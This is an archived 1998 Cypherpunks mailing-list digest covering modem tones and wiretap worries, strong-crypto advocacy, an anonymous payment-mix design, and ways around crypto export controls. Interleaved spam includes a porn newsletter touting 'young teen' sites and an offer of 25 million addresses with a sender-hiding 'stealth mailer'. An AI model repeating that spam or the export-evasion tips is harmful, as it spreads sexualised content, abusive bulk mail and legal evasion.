He could try dialing another number from that phone to see if he gets the
tone, or calling the ISP from another location, such as a pay phone, if 
he feels like experimenting.

"Just because you're paranoid doesn't mean that nobody's out to get you."

;)

-r.w.

On Mon, 16 Feb 1998, Ken Williams wrote:

> anybody have any ideas here?  this is a personal email forwarded to me
> from a friend who *might* have cause to believe he is bugged.  this is
> coming from a .au domain, btw.
> 
> thanx,
> 
> TATTOOMAN
> 
> http://152.7.11.38/~tattooman
> 
> ---------- Forwarded message ----------
> Date: Mon, 16 Feb 1998 20:41:23 +0930
> From: XXX@XXX.XXX
> To: jkwilli2@unity.ncsu.edu
> Subject: PGP
> 
> Yo tat,
> 
> I got pgp 5.0. which will not work with your version. Upgrade man :-)
> 
> Oh well I'll tell ya without pgp. It's not that much of a problem the
> question I wanted to ask you (well I hope it's not).
> 
> Anyway, what I wanted to ask you is whether you might know why I'm getting
> a very DISTINCTIVE beep when I connect with my modem to my ISP. The
> beep(only once) comes just after the initial dialup and just before all the
> noise you get before the connection. 
> 
> Sounds wierd and it only started 2 days ago. I never heard a connection
> like this before and I'm wondering whether my phone line is being tapped. 
> 
> Any suggestions ??
> 
> XXXXX
> 
> P.S. Just in case my mail is being read by someone other than
> Tattooman..here's to you (_|_)
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Mon, 16 Feb 1998 00:52:51 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: <fyi> World-market Crypto for SSL (fwd)
Message-ID: <Pine.SOL.3.96.980216034853.28223A-100000@c00069-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



suggestions or help with this one?  what do you ppl think?

Regards,

tattooman
http://152.7.11.38/~tattooman

---------- Forwarded message ----------
Date: Sun, 15 Feb 1998 11:48:01 -0500
From: XXX
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Re: <fyi> World-market Crypto for SSL

Hi Ken,

	Thanks for the note.  I've got an idea I wanted to bounce off you,
since Tattooman seems a suitably non-corporate persona.  I'm one of those
who believes that the world will be a better place if all people have ready
access to strong crypto, for their own personal musing (for what hope has
democracy -- or individualism, or community -- if people can not safely
muse on unpopular or illicit options, deciding what is right by carefully
considering what is wrong as well as right.)  I also believe that strong
crypto is all that can allow online international commerce, and commerce
and trade is the fundamental alternative to war, armed might, and
spook-driven controls on inter-cultural relationships.)  The core struggle
of our time is likely to be between those who want to rely on from-the-top
bureaucratic control, essentially militaristic control of friends and foe,
and those who trust instead in evolving common needs and mutually
beneficial trade interactions between societies and nations.

	(The fact that the most valuable resource of any future information
age -- intellectual capital, human brainpower -- is much more equitably
distributed among nations than other "natural" resources, like coal, or
gold, also gives me hope for a future in which all nations can offer
intellectual trade-good of value and partake of a health and
profitable-to-all world trade.)

	Here's my thought:  in the immediate future, Fortify (or some
similar freeware product) will offer anyone in the world a chance to
upgrade the tens of millions of export-quality (weak crypto) versions of
Netscape in circulation, to make them strong-crypto products with both SSL
(and soon S/MIME) available to all.

	One of the big questions in how this world-wide struggle between
statist forces who want to restrict individual (and corporate) access to
strong crypto internationally, and those of us who instead want to foster
the widespread use of strong crypto, is how to educate and promote the use
of strong-crypto versions of Netscape (since that is today the upgradable
product available worldwide.)

	What I would like to see is one or several CGI packages which folks
could put on their websites which would quickly alert a user that the
browser he is using has only limited and restricted export-quality weak
crypto, and that he or she should immediately consider upgrading to strong
crypto by obtaining Fortify (or other upgrade packages) from XXX website.
C2, which is accessible through the Fortify website: www.fortify.net has
something like this for SSL.  I'm looking into getting something similar
for S/MIME -- assuming McKay or others get the S/MIME-enhanced version of
Fortify in circulation within a few weeks.

	Any ideas about how to get this going?

	Regards,

		XXX

PS.  Your note caught me as I was thinking this through, so you doubtless
got a more wordy and political response than you expected.  Still, this is
an open issue of great importance, IMNSHO, and I'd be grateful for any
energy or suggestions you might offer.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: search@owedmoney.com
Date: Mon, 16 Feb 1998 04:49:07 -0800 (PST)
To: info@owedmoney.com
Subject: Over 400 Billion Dollars Is Owed To The North American Public!
Message-ID: <199802161235.EAA00189@funds1.fundsrecovery.com>
MIME-Version: 1.0
Content-Type: text/plain



ATTENTION:  This is an awareness notification from Personal Funds
Recovery, Inc.  http://www.fundsrecovery.com

We want to inform the North American public about money they are owed,
and then help them get it back.  

There is over 400 billion dollars in unclaimed money in the U.S.  

More than 50% of North Americans are owed a portion of this money.  

You should check to see if you are owed some of this money.

It is unclaimed money that people simply forgot about or never knew
existed.  Here are some examples: checking and savings accounts, 
stocks and bonds, IRA accounts, teacher retirement plans, union
pensions, dividends, payroll checks, insurance policies, security
deposits, safety deposit boxes, pension funds, the Social Security
Administration, United States Treasury, Internal Revenue Service,
and many, many more.

Visit our web site at http://www.fundsrecovery.com and we will conduct
a search for you.  We can also perform a search for companies! 

P.S.  If you wish to be removed from further notifications please reply
by email and include the word remove in the subject heading.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Mon, 16 Feb 1998 03:21:07 -0800 (PST)
To: hh-chat@gateway-1.secureservers.net
Subject: bugged?
Message-ID: <Pine.SOL.3.96.980216061644.7638A-100000@c00953-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


anybody have any ideas here?  this is a personal email forwarded to me
from a friend who *might* have cause to believe he is bugged.  this is
coming from a .au domain, btw.

thanx,

TATTOOMAN

http://152.7.11.38/~tattooman

---------- Forwarded message ----------
Date: Mon, 16 Feb 1998 20:41:23 +0930
From: XXX@XXX.XXX
To: jkwilli2@unity.ncsu.edu
Subject: PGP

Yo tat,

I got pgp 5.0. which will not work with your version. Upgrade man :-)

Oh well I'll tell ya without pgp. It's not that much of a problem the
question I wanted to ask you (well I hope it's not).

Anyway, what I wanted to ask you is whether you might know why I'm getting
a very DISTINCTIVE beep when I connect with my modem to my ISP. The
beep(only once) comes just after the initial dialup and just before all the
noise you get before the connection. 

Sounds wierd and it only started 2 days ago. I never heard a connection
like this before and I'm wondering whether my phone line is being tapped. 

Any suggestions ??

XXXXX

P.S. Just in case my mail is being read by someone other than
Tattooman..here's to you (_|_)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 15 Feb 1998 22:19:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: high speed management method
Message-ID: <199802160619.HAA26138@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Please teach high speed management method
of block cypher to me.
Thanks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xavier Man <mrman@mybutt.com>
Date: Mon, 16 Feb 1998 05:49:47 -0800 (PST)
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Re: bugged?
In-Reply-To: <Pine.SOL.3.96.980216061644.7638A-100000@c00953-100lez.eos.ncsu.edu>
Message-ID: <Pine.LNX.3.96.980216074013.8723B-100000@lagwagon.mybutt.com>
MIME-Version: 1.0
Content-Type: text/plain


Ascend MAX 4000/4002/4004/etc units running certain code versions emit a
"burp" tone  before they initiate carrier.  If your friends ISP is using
these, then he shouldn't have much to worry about.  A quick way to test
would be to just call up the ISP and ask, though that's a little obvious.
What you can do is go to a payphone and make a call to the ISPs dialup
number and see if it emits the tone then.  If it does, I'd go ahead and
make you next call to the ISP.  Just give some poor schmuck in tech
support a hard time and find out what equipment they use for the dialin
pool.  If it's Ascend, then that's your problem.

Mr. Man - mrman@mybutt.com

On Mon, 16 Feb 1998, Ken Williams wrote:

> anybody have any ideas here?  this is a personal email forwarded to me
> from a friend who *might* have cause to believe he is bugged.  this is
> coming from a .au domain, btw.
> 
> thanx,
> 
> TATTOOMAN
> 
> http://152.7.11.38/~tattooman
> 
> ---------- Forwarded message ----------
> Date: Mon, 16 Feb 1998 20:41:23 +0930
> From: XXX@XXX.XXX
> To: jkwilli2@unity.ncsu.edu
> Subject: PGP
> 
> Yo tat,
> 
> I got pgp 5.0. which will not work with your version. Upgrade man :-)
> 
> Oh well I'll tell ya without pgp. It's not that much of a problem the
> question I wanted to ask you (well I hope it's not).
> 
> Anyway, what I wanted to ask you is whether you might know why I'm getting
> a very DISTINCTIVE beep when I connect with my modem to my ISP. The
> beep(only once) comes just after the initial dialup and just before all the
> noise you get before the connection. 
> 
> Sounds wierd and it only started 2 days ago. I never heard a connection
> like this before and I'm wondering whether my phone line is being tapped. 
> 
> Any suggestions ??
> 
> XXXXX
> 
> P.S. Just in case my mail is being read by someone other than
> Tattooman..here's to you (_|_)
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <x@x.com>
Date: Mon, 16 Feb 1998 08:14:49 -0800 (PST)
To: Ken Williams <hh-chat@gateway-1.secureservers.net
Subject: Re: bugged?
Message-ID: <3.0.32.19980216081504.006a9e08@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Could be wrong, but mine started beeping when ISP switched to new digital
modems to support 56K.
Now, that obviously doesn't mean he's NOT bugged - but Occam's razor and
all that.


At 06:20 AM 2/16/98 -0500, Ken Williams wrote:
>
>anybody have any ideas here?  this is a personal email forwarded to me
>from a friend who *might* have cause to believe he is bugged.  this is
>coming from a .au domain, btw.
>
>thanx,
>
>TATTOOMAN
>
>http://152.7.11.38/~tattooman
>
>---------- Forwarded message ----------
>Date: Mon, 16 Feb 1998 20:41:23 +0930
>From: XXX@XXX.XXX
>To: jkwilli2@unity.ncsu.edu
>Subject: PGP
>
>Yo tat,
>
>I got pgp 5.0. which will not work with your version. Upgrade man :-)
>
>Oh well I'll tell ya without pgp. It's not that much of a problem the
>question I wanted to ask you (well I hope it's not).
>
>Anyway, what I wanted to ask you is whether you might know why I'm getting
>a very DISTINCTIVE beep when I connect with my modem to my ISP. The
>beep(only once) comes just after the initial dialup and just before all the
>noise you get before the connection. 
>
>Sounds wierd and it only started 2 days ago. I never heard a connection
>like this before and I'm wondering whether my phone line is being tapped. 
>
>Any suggestions ??
>
>XXXXX
>
>P.S. Just in case my mail is being read by someone other than
>Tattooman..here's to you (_|_)
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Mon, 16 Feb 1998 10:52:28 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Mon Feb 16 '98
Message-ID: <19980216083643.29514.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Monday's issue of Eureka!

FRESHTEENS!
Is there no end to it? Yet again we have succeeded in obtai-
ning a FREE one week trial,  for all Eureka!  subscribers at
another of the net's finest websites. Freshteens offers over
200 video feeds, hot live,  sex shows,  hard XXX movies, hot
XXX stories,  exclusive Texas Teens, and a comprehensive gay
area too. You need a credit card to verify you are an adult,
but will not be charged for your FREE membership. Excellent!
Freshteens ........... http://www.freshteens.com/cproot/1217

100% FREE TEEN SITE
http://www.wildteensex.com
check out this new 100% FREE teen site, we have HOT, HORNY,
and at all time VERY WET young teen girls!

BI-FEM-XXX
This website features two young amateurs kissing and licking
each others pussys.  The images offer easy access with thumb
nails. Not the highest quality images but worth a quick stop.
Bi-Fem-XXX ............... http://www.ravage.com/bi-fem-xxx/

KIMMIES BORDELLO
Cruise by this website to see high resloution, thumbnailed
free pix!  Featuring, blondes, 18 and up, oriental, oral, 
lesbian lover, cum shot, amateurs and steamy erotic fiction.
Kimmies ............... http://www.kimmisbordello.com/kimmi/

GLAMOUR PORTFOLIOS
A must stop on the information porno superhighway!  If you 
like looking at a bunch of beautiful women hanging out by the
pool naked then this is your place. Click on a girl, see her
tits.  Now this is what I call interactive multimedia.  Yes!
Glamour .................. http://www.glamourportfolios.com/

BLUESATIN
This is a very clean well built website.  And it delivers!
They have a paysite attraction but a lot of free images to
show us what they have.  Your choice of oral, anal, teens,
tinkle, toys, hardcore, babes, lesbians, fetish and more!
By the way, if you like watching people urinate, this is it.
Bluesatin .............. http://www.bluesatin.com/index.html

READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A

HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
3 Blonde --> http://www.spreadteens.com/ian/blondevideo.html

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
PJ: She is a self-described  biker-bitch.  Not only does her
site include  many  nude  pictures  of  her  (and  her large
boobs!) but what makes the  site  is  her sarcastic sense of
humor. This gal  has  a  great  ass  that  has polished many
Harleys, and makes a person  wish  he  had  a hog for her to
ride. Visit her site now, and hold on to those handle bars!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
XXXStories.com: The largest free  erotic  story  site on the
net. Over 400 hot sex stories  on such topics as wife sluts,
virgins, group sex and more...... http://www.xxxstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?160
Pic  2 --------------------------> http://137.39.63.229/?161
Pic  3 --------------------------> http://137.39.63.229/?162
Pic  4 --------------------------> http://137.39.63.229/?163
Pic  5 --------------------------> http://137.39.63.229/?164
Pic  6 --------------------------> http://137.39.63.229/?165
Pic  7 --------------------------> http://137.39.63.229/?166
Pic  8 --------------------------> http://137.39.63.229/?167
Pic  9 --------------------------> http://137.39.63.229/?168
Pic 10 --------------------------> http://137.39.63.229/?169

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 63062395@aol.com
Date: Mon, 16 Feb 1998 22:55:00 -0800 (PST)
To: user@forwarding.com
Subject: *******   Interested in bulk mailing ? ->>> READ THIS!!!   *******
Message-ID: <199802153453CAA8394@post.ur.mx>
MIME-Version: 1.0
Content-Type: text/plain


            25 MILLION EMAIL  ADDRESSES VIA E-MAIL FOR ONLY $34.95


************************************************************************************************* 
         Your  email  address was given to us as a person interested in business
         opportunities...  IF  THIS  IS  NOT  CORRECT, then  please accept  our
                             apologies. You will NOT be contacted again.

*************************************************************************************************

In order to sell your products, they have to be advertised. ... And in order for you to
buy  them, they  have  to  be advertised. You always need customers. What better
way to find customers that you need?  Through e-mailing. What faster way to send
Ads, Letters and Flyers to millions of people? Through e-mailing. 

We  are  offering  YOU  25  Million  FRESH  E-mail  Addresses  for  the low price of
$34.95. They  are all sorted and ready to be mailed. That is the best deal  anywhere
today! These 25 Million  e-mail addresses are  yours to  keep, so you can use them
over  and  over. Imagine selling  a  product  for  only  $1  and  getting only  a  1/10%
response - that's $250,000  in your pocket !

We also include the FREE stealth mailer as  a  GIFT  to our  customer. This is a lite
version of the incredibly fast  mailing  program that  hides your email  address  when
you send  mail so  no one will  find out where  it  came from and you won't lose your
dial up account.


Print this E-Mail, fill the order form.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

                                                    ORDER FORM

Yes, send me 25 million of e-mail addresses to my E-Mail address:

_________________________________/_______________________________
                                           Please PRINT TWICE

Enclosed is my payment of  $34.95    ____Check    ____Money order

Name__________________________  Address__________________________

Apt.______City____________________State______ Zip Code______________


                     * Make Check/Money order payable, and mail the form to:

                                                   First Choice Ltd.

                                  14431 VENTURA BLVD., SUITE 142
                                       SHERMAN OAKS, CA 91423 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 16 Feb 1998 12:11:07 -0800 (PST)
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Re: bugged?
In-Reply-To: <Pine.SOL.3.96.980216061644.7638A-100000@c00953-100lez.eos.ncsu.edu>
Message-ID: <3.0.5.32.19980216120541.03d20460@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain


At 06:20 AM 2/16/98 -0500, Ken Williams wrote:
>
>anybody have any ideas here?  this is a personal email forwarded to me
>from a friend who *might* have cause to believe he is bugged.  this is
>coming from a .au domain, btw.

Sounds like he has a 56k modem and his ISP just upgraded to the same sort
of 56k modem he has.  That is part of the protocol negotiation.  (In the
future, it will take 30 minutes to finish connecting with a modem, but we
will all get 666k transmission speed over normal phone lines.)

>
>thanx,
>
>TATTOOMAN
>
>http://152.7.11.38/~tattooman
>
>---------- Forwarded message ----------
>Date: Mon, 16 Feb 1998 20:41:23 +0930
>From: XXX@XXX.XXX
>To: jkwilli2@unity.ncsu.edu
>Subject: PGP
>
>Yo tat,
>
>I got pgp 5.0. which will not work with your version. Upgrade man :-)
>
>Oh well I'll tell ya without pgp. It's not that much of a problem the
>question I wanted to ask you (well I hope it's not).
>
>Anyway, what I wanted to ask you is whether you might know why I'm getting
>a very DISTINCTIVE beep when I connect with my modem to my ISP. The
>beep(only once) comes just after the initial dialup and just before all the
>noise you get before the connection. 
>
>Sounds wierd and it only started 2 days ago. I never heard a connection
>like this before and I'm wondering whether my phone line is being tapped. 
>
>Any suggestions ??
>
>XXXXX
>
>P.S. Just in case my mail is being read by someone other than
>Tattooman..here's to you (_|_)
>
>
---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas Junker" <tjunker@phoenix.net>
Date: Mon, 16 Feb 1998 12:39:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: bugged?
In-Reply-To: <3.0.32.19980216081504.006a9e08@shell15.ba.best.com>
Message-ID: <199802162039.OAA12379@virtual5.c-com.net>
MIME-Version: 1.0
Content-Type: text/plain


On 16 Feb 98 at 8:16, x wrote:

> Could be wrong, but mine started beeping when ISP switched to new digital
> modems to support 56K.

Same here.  I assumed it was an answer burp for 56K,
followed by a momentary pause to see if the calling modem
responds and negotiates 56K.  Mine isn't, so after the 
pause the ISP modem puts up standard V.34 answer tone.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 16 Feb 1998 23:08:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: payment mix
Message-ID: <19980216211932.17385@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


A payment mix is like an email mix, but instead of mixing and remailing
emails, it mixes and repays payments. This would be useful when the
payment system itself does not offer anonymity. A payment mix basicly
turns any traceable payment system into an anonymous one.

Payment mixes could be chained for additional security, just like email
mixes. But by using blind signatures this could also be avoided. In that
case the payment mix would be acting like a mini ecash mint. To illustrate
how it would work, suppose Alice wants to give $1 to Bob.

1. Alice pays $1 to the payment mix using the traceable payment system.

2. In exchange, the payment mix issues Alice $1 in blinded (Chaumian)
ecash.

3. Alice gives the ecash to Bob.

4. Bob gives the ecash back to the payment mix.

5. The payment mix pays Bob $1 using the traceable payment system.

Notice that because of blinding, in step 4 the payment mix cannot connect
the ecash it gets from Bob to the ecash it issued to Alice.

This is a pretty simple idea, but I don't remember if we talked about it
here already. If blinding is used, a payment mix would basicly BE an ecash
mint, except the cash it issues would be held only momentarily by its
users. Because its total outstanding liability at any given moment would
be fairly low, a payment mix would only have to be minimally trusted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pics@bj.janey.com
Date: Mon, 16 Feb 1998 22:55:31 -0800 (PST)
To: pics@bj.janey.com
Subject: OWN YOUR OWN PAYSITE
Message-ID: <99552677_81166594>
MIME-Version: 1.0
Content-Type: text/plain



Hi,
    Have you ever wondered how paysites pay up to 10 cents or moreper click? The reason is because all the recurring revenue they have!! If you're interested in starting up your own paysite & can send atleast 3 members per day then take a look at http://www.teennympho.com/rawclicks/pprogram.html!! Only people who are serious about the program should apply ;-)

	Thanx,
		Ryan Lanane





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Feb 1998 17:52:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: We've been found out
Message-ID: <199802170151.CAA08654@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Damn! I thought we had everyone fooled.

Some pissant wrote:
Death of a Legend / The Truth About the CypherPunks:
The CypherPunks have long been renowned as standing at the bleeding edge 
of
the burdgeoning computer technology which is rapidly changing the face 
of our
planet and the governmental, civil, and social societies encompassed 
within
this celestial orb.
Harbingers of the Digital Future / Pioneers of Future Technology / etc., 
etc.
Bullshit...
The CypherPunks are rag-tag band of infantile, pseudo-anarchistic, 
pseudo-
cryptic, well-educated shit-disturbers who take great pleasure in 
pissing on
themselves, each other, and the world around them--all the while, 
covering
their motivations and ambitions with high-sounding ideals intended to 
disguise
the fact that none of them ever received proper toilet-training.


The end result?
No matter how high they pile it, how far they spread it, or how badly it 
smells when you step in it, they end up coming off as the Henry 
Kissinger's
of CyberSpace, because no matter how much rotten meat, jalapenos and 
moldy
cheese they eat, they can never manage to crap out anything so vile and 
foul-
smelling that the world-at-large cannot prove prophetic in MeatSpace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Feb 1998 18:28:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <199802161748.SAA24779@basement.replay.com>
Message-ID: <199802170228.DAA14045@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous asks:

> If its so easy to make your own biological weapons,
> hoembrewed in a bathtub (or vat or whatever), how
> about posting some web links or pointers?
> 
> If its so easy why haven't more downtrodden
> Americans (there are a lot of loonies in this
> country) tried this stuff out yet?


Because it's so easy to kill yourself doing so.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: U812@swbell.net
Date: Tue, 17 Feb 1998 05:58:29 -0800 (PST)
To: U812@swbell.net
Subject: Phone rates as low as 3cents/min.
Message-ID: <199802171358.HAA16588@pop2.rcsntx.swbell.net>
MIME-Version: 1.0
Content-Type: text/plain


NEW Technology Breakthrough will save consumers MILLIONS!

YOU CAN SAVE UP TO 70% on State to State and International calls, even  if your present rate is 9.9 cents/ minute or lower  !

 Never a need to change Providers.

The TeleChron routes calls around your PIC (Primary Interexchange Carrier)
to maximize your savings by searching for the lowest rates available, based
on the time, type and destination of your call. This small box (circuit
board) the size of a cassette tape plugs right into your phone jack.

The Telchron is Int'l patented & FCC approved. US patent, pending. 

For more info. 
On how You may purchase or You may also participate as an
independent distributor of the TeleChron. Note: Earn residuals too! GROUND FLOOR
OPPORTUNITY!!

Send an e-mail to by placing "Product" or "Opportunity" or
"Both" in the subject line to aurapro@yahoo.com
Or call : Terry @ 214-750-4738

We thank you for your time,

Sincerely,

CTX Business Solutions


///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 17 Feb 1998 09:32:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: crackers
In-Reply-To: <f27464ed.34e60b2a@aol.com>
Message-ID: <3.0.5.32.19980217091147.007cae80@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:22 PM 2/14/98 EST, Ah1261@aol.com wrote:
>I WOULD LIKE SOME INFO ON PASSWORD CRACKERS EMAIL ME BACK A.S.A.P.
>

ARE PASSWORD CRACKERS LIKE MILK BISCUITS?


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	Has Nike hired Monica to endorse kneepads yet?





	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdew@el.nec.com (Bob De Witt)
Date: Tue, 17 Feb 1998 10:46:53 -0800 (PST)
To: jkwilli2@unity.ncsu.edu
Subject: Re: Letter of the law
Message-ID: <199802171845.KAA11835@yginsburg.el.nec.com>
MIME-Version: 1.0
Content-Type: text/plain


Doesn't the act of taking it across the border, in the laptop, constitute
an act of export??

> From jkwilli2@unity.ncsu.edu Sat Feb 14 02:07:45 1998
> X-Authentication-Warning: c00954-100lez.eos.ncsu.edu: jkwilli2 owned process doing -bs
> Date: Sat, 14 Feb 1998 04:27:29 -0500 (EST)
> From: Ken Williams <jkwilli2@unity.ncsu.edu>
> X-Sender: jkwilli2@c00954-100lez.eos.ncsu.edu
> To: cypherpunks@toad.com
> Subject: Re: Letter of the law
> X-Copyright: The contents of this message may not be reproduced in any form
> X-Copyright: (including Commercial use) unless specific permission is granted
> X-Copyright: by the author of the message.  All requests must be in writing.
> X-Disclaimer: The contents of this email are for educational purposes only
> X-Disclaimer: and do not reflect the thoughts or opinions of either myself
> X-Disclaimer: or my employer and are not endorsed by sponsored by or provided
> X-Disclaimer: on behalf of North Carolina State University.
> MIME-Version: 1.0
> 
> On Fri, 13 Feb 1998, Anonymous wrote:
> 
> >>I'm in El Paso Texas... so close to the border
> >>I can see Old Mex outside my window as I write this..
> >>I'm over there nearly every day for lunch ( I actually
> >>walk there from my house it's so close) If I write
> >>a crypto program on my laptop over there and ftp
> >>it to a web page I have on a server outside the US
> >>will I have avoided the foolish export regs??
> >>Does anyone know of someone trying this before?? 
> >
> >My guess is this:
> >  if it has the name of a US citizen in the copyright
> >notice, it will be assumed to have been made in the
> >US. if the morons even go after you. you still may have
> >a plausable excuse if ever taken to court.
> >after all, you "exported" youself, which is a perfectly
> >legal thing to take out of the country, and "yourself"
> >accidentally spewed a copy of something that couldn't
> >cross the border.
> >I don't think anybody has tried this and been challenged.
> >then again, a lot of us don't have the opportunity.
> >It's easier to ask forgivness than permission...
> >Another easier excuse would be to publish it freely in
> >hardcopy form, and just "happen" to have somebody end up
> >"typing" in your source code abroad, making a legit
> >international copy...
> >-Anon2
> 
> i would think that the big question here, legally, is whether or not you
> would be ustilizing a US ISP and/or cellular provider to make the upload
> of the crypto program to the foreign server via ftp.  as long as all the
> packets stay outside of US borders, in other words, as long as you don't
> use a US ISP and cellular provider, then i don't see how you would be
> violating any laws in this case.
> 
> Regards,
> 
> TATTOOMAN 
> 
> http://152.7.11.38/~tattooman/
> 
Bob De Witt,
rdew@el.nec.com
The views expressed herein are my own,
and are not attributable to any other
source, be it employer, friend or foe.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Tue, 17 Feb 1998 10:56:45 -0800 (PST)
To: Bob De Witt <rdew@el.nec.com>
Subject: Re: Letter of the law
In-Reply-To: <199802171845.KAA11835@yginsburg.el.nec.com>
Message-ID: <Pine.SOL.3.96.980217135102.29424A-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Feb 1998, Bob De Witt wrote:

>Doesn't the act of taking it across the border, in the laptop, constitute
>an act of export??

well, yes, of course.  that was taken for granted in my comments.
likewise, if you go to a tattoo parlor and get the infamous 4 line
crypto-sig tattooed on your ass, then you are classified as a munition,
and you cannot leave the US.

the only relevant question here regards the odds that a US Customs officer
is going to want you to drop your drawers and bend over...
;-)

ken 

>> >>I'm in El Paso Texas... so close to the border
>> >>I can see Old Mex outside my window as I write this..
>> >>I'm over there nearly every day for lunch ( I actually
>> >>walk there from my house it's so close) If I write
>> >>a crypto program on my laptop over there and ftp
